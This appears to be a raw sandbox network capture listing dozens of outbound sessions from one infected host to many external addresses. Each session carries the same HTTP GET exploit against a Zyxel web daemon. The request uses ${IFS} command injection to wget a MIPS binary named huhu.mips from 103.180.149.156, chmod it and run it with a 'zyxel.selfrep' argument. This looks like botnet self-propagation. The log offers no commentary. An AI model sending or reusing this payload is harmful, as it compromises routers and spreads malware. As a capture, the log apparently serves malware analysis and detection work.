                                                      Feb 2, 2024 06:36:01.819977045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6588192.168.2.1435866134.199.149.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820008993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6589192.168.2.1443704194.33.108.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820044041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6590192.168.2.1435138107.92.153.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820082903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6591192.168.2.1432966131.229.214.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820135117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6592192.168.2.144866494.61.231.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820168018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6593192.168.2.144423659.195.79.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820219040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6594192.168.2.143766646.173.179.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820255041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6595192.168.2.1460206190.39.108.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820323944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6596192.168.2.144773447.128.102.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820347071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6597192.168.2.1442456155.42.192.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820394993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6598192.168.2.143481635.19.42.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820420027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6599192.168.2.1450874194.125.127.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820455074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6600192.168.2.1450626141.86.126.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820508957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6601192.168.2.1441126192.185.239.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820548058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6602192.168.2.1439360192.215.164.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820574999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6603192.168.2.1452790115.111.120.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820631027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6604192.168.2.144117081.160.231.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820660114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6605192.168.2.145606093.211.53.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820693970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6606192.168.2.143522662.160.240.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820727110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6607192.168.2.145618865.223.40.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820765018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6608192.168.2.1437852168.88.6.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820821047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6609192.168.2.145188013.46.239.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820856094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6610192.168.2.143607085.198.159.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820909977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6611192.168.2.144594027.143.158.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820947886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6612192.168.2.1455468216.57.209.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.820981026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6613192.168.2.144928666.226.173.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821017027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6614192.168.2.1437436220.253.100.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821038008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6615192.168.2.1435318122.226.228.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821080923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6616192.168.2.145303285.115.167.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821142912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6617192.168.2.145036693.130.224.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821182013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6618192.168.2.1439840141.47.182.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821199894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6619192.168.2.143283661.161.140.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821266890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6620192.168.2.144482678.213.175.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821296930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6621192.168.2.1435074176.48.61.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821348906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6622192.168.2.1451924166.57.145.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821361065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6623192.168.2.1451688218.68.108.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821402073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6624192.168.2.144830248.232.157.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821432114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6625192.168.2.1436558140.28.128.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821491957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6626192.168.2.144174868.78.232.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821542025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6627192.168.2.1436454180.9.201.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821573019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6628192.168.2.143280057.33.53.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821607113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6629192.168.2.1436248184.175.145.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821655989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6630192.168.2.1442920144.52.143.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821683884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6631192.168.2.1432932184.138.250.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821736097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6632192.168.2.143736872.180.10.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821767092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6633192.168.2.1447260110.165.230.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821820974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6634192.168.2.143761691.84.50.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821844101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6635192.168.2.145588613.183.140.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821899891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6636192.168.2.1442738123.43.245.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821930885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6637192.168.2.1454746160.20.114.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821964025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6638192.168.2.143562236.112.148.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.821995020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6639192.168.2.143688444.14.166.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822041035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6640192.168.2.1440438200.244.217.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822067976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6641192.168.2.1436086174.251.118.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822114944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6642192.168.2.143913614.67.54.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822176933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6643192.168.2.144242073.163.69.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822215080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6644192.168.2.144396653.199.58.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822252035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6645192.168.2.1445006114.93.171.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822309971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6646192.168.2.143655065.3.37.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822345018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6647192.168.2.145224032.97.119.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822364092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6648192.168.2.144845883.53.247.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822416067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6649192.168.2.1447070176.107.0.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822458029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6650192.168.2.1440012178.255.137.209443
                                                      TimestampBytes transferredDirectionData
